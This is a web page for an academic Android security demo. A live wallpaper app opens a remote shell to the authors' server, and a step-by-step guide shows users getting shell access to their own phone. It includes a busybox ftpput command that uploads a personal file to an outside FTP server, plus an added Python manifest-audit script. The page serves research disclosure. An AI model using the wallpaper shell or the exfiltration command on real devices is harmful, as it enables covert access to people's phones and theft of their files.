The basic premise is that users need to be wary of permissions when they install an application on Android.
We demonstrate how this trust can be violated by gaining shell access to the device and executing arbitrary commands.
One point of note is how full-network access permission is not required to send data to the Internet, only to receive it.
Even more notable is that this permission is almost entirely hidden in later versions of Android, belittling the risk.
The demo guide can be found below, along with the 2058062035
The first step is to install the app, which can be found under the downloads section.
Next, go to our demo.
You should see a dark grey page with a Terminal: SSH box in the middle. If the Terminal: SSH option doesn't appear, refresh the page. This can be a first-view issue.
Click on the Terminal: SSH box to start a new terminal. It will request the following information:
After entering all the info and logging in, go to your device settings, display and wallpapers, and set "Open Shell - Cube" as your wallpaper.
Setting the wallpaper establishes a connection with the server, and you viewing the wallpaper will show which port it has connected on.
To gain access to your session, type in the terminal
screen -r followed by the port number shown on your screen, e.g.
screen -r 10000
You should now be connected to your device and see this indicated on the screen, meaning you're able to issue commands now!
Try ls to see if it's working. If a few files are listed, you're ready to go!
You now have shell access to your Android device. This isn't root access, but you still have a scary amount of power!
Feel free to poke around your device now if you're familiar with shell commands, but I'll give an example below.
If any of the commands seem to hang, try pressing
Ctrl + C to abort it, or reconnecting to the site and resetting the wallpaper if disconnected.
To close the tunnel intentionally, type exit in the terminal, hit the X in the top-right, change your wallpaper and reboot your device, or uninstall the app.
For a good example of how this could be used maliciously, the following guides you through uploading one of your files to our test FTP server.
To try this out, browse to some of your files, like in
DCIM/Camera, so try
cd /sdcard/Download and then
ls to find a file.
Once you have found a suitable file to transfer, we can move it to the app directory with
cp FILENAME /data/data/com.nextproject.openshell/files
Now that it is in the app files, we can move back to that folder with
Lastly, we use
./busybox ftpput -u ftpdemo -p ftppassword -P 2121 126.96.36.199 /files/FILENAME FILENAME
For those interested, more information on busybox can be found here.
The version used in this app may be a little outdated depending on your time of viewing, but it still adds a lot of commands to our shell!
The file should now be located on the FTP server I set up for this demo, which you can check for yourself with the same credentials.
Use an FTP client like WinSCP, Filezilla, etc. to see the file with the above credentials, and delete it afterwards for your own privacy.
All uploaded files will be periodically removed at an indeterminate interval, but it's always good to be safe!
Beyond peeking at your files, the shell access can execute other commands, such as those exposed in the interfaces of other applications.
Again, to close the tunnel intentionally, type exit in the terminal, hit the X in the top-right, change your wallpaper and reboot your device, or uninstall the app.
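For readers who want to check an app before installing it, the combination this demo relies on (a live wallpaper service together with the full network access permission, android.permission.INTERNET, which is granted at install time without a prompt) is visible in the app's decoded manifest. The following is an added example, not code from the Open Shell project; the sample manifest is constructed, and the package name com.example.cubewallpaper and the function audit_manifest are hypothetical.

```python
import xml.etree.ElementTree as ET

ANDROID = "{http://schemas.android.com/apk/res/android}"
# "Full network access" in the store listing; granted at install, no runtime prompt.
NETWORK_PERMS = {"android.permission.INTERNET"}
# Markers of a live wallpaper service in the manifest.
WALLPAPER_ACTION = "android.service.wallpaper.WallpaperService"
WALLPAPER_BIND = "android.permission.BIND_WALLPAPER"

# Constructed sample: a decoded AndroidManifest.xml for a hypothetical package.
SAMPLE_MANIFEST = """<manifest xmlns:android="http://schemas.android.com/apk/res/android"
    package="com.example.cubewallpaper">
  <uses-permission android:name="android.permission.INTERNET"/>
  <application android:label="Cube">
    <service android:name=".CubeService"
        android:permission="android.permission.BIND_WALLPAPER">
      <intent-filter>
        <action android:name="android.service.wallpaper.WallpaperService"/>
      </intent-filter>
    </service>
  </application>
</manifest>"""


def audit_manifest(xml_text):
    """Report whether a manifest declares a live wallpaper that can open sockets."""
    root = ET.fromstring(xml_text)
    perms = {p.get(ANDROID + "name") for p in root.iter("uses-permission")}
    wallpapers = []
    for svc in root.iter("service"):
        actions = {a.get(ANDROID + "name") for a in svc.iter("action")}
        bound = svc.get(ANDROID + "permission") == WALLPAPER_BIND
        if WALLPAPER_ACTION in actions or bound:
            wallpapers.append(svc.get(ANDROID + "name"))
    network = sorted(perms & NETWORK_PERMS)
    return {
        "package": root.get("package"),
        "network_permissions": network,
        "wallpaper_services": wallpapers,
        # Both present: the wallpaper process can talk to a remote host,
        # so the app deserves a manual review before it is installed.
        "flag": bool(network and wallpapers),
    }


if __name__ == "__main__":
    print(audit_manifest(SAMPLE_MANIFEST))
```

The input is the text form of the manifest, as produced by a decoder such as apktool; the binary manifest inside an APK has to be decoded first.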
In the event that our server becomes overloaded with requests and the demo ceases to function, we invite you to try it yourself!
In the Downloads section to follow you will find the GitHub repositories for all of the code used for the website and app.
Detailed instructions and scripts are provided in these repositories and the site is Dockerized for easier deployment.
Should you find some addition that could be of benefit to either the site or the app, we would love to hear about it!
Please do not hesitate to create an issue/pull request on GitHub or contact us via email to discuss or improve Open Shell.
Our app can be found on Google Play on supported devices:
The APK file you have to install to your Android device to try out the demo can also be downloaded directly.
The formal research paper containing the theory and background behind this exploit can be downloaded here.
The GitHub page where the code for this site and the Docker containers used for the demo can be found here.
The GitHub page where the code for the Android app using Android Studio can be found here.
Please use the following reference in citing this research and application:
Mahmoud, Q.H., Kauling, D., and Zanin, S. "Hidden Android Permissions: Remote Code Execution and Shell Access using a Live Wallpaper"
In Proceedings of the 14th IEEE Annual Consumer Communications & Networking Conference (CCNC 2017), Las Vegas, NV, USA, Jan 2017, pp. 598-599.
This website and live demonstration was created by Dylan Kauling, but the concept is not mine!
The exploit/app was created by a student under the guidance of Dr. Qusay Mahmoud at UOIT.
If you have any questions about the concept and applications, contact Dr. Mahmoud -
If you have any technical questions about the demo or are having troubles getting it working, feel free to shoot me an email! -
Google Play and the Google Play logo are trademarks of Google Inc.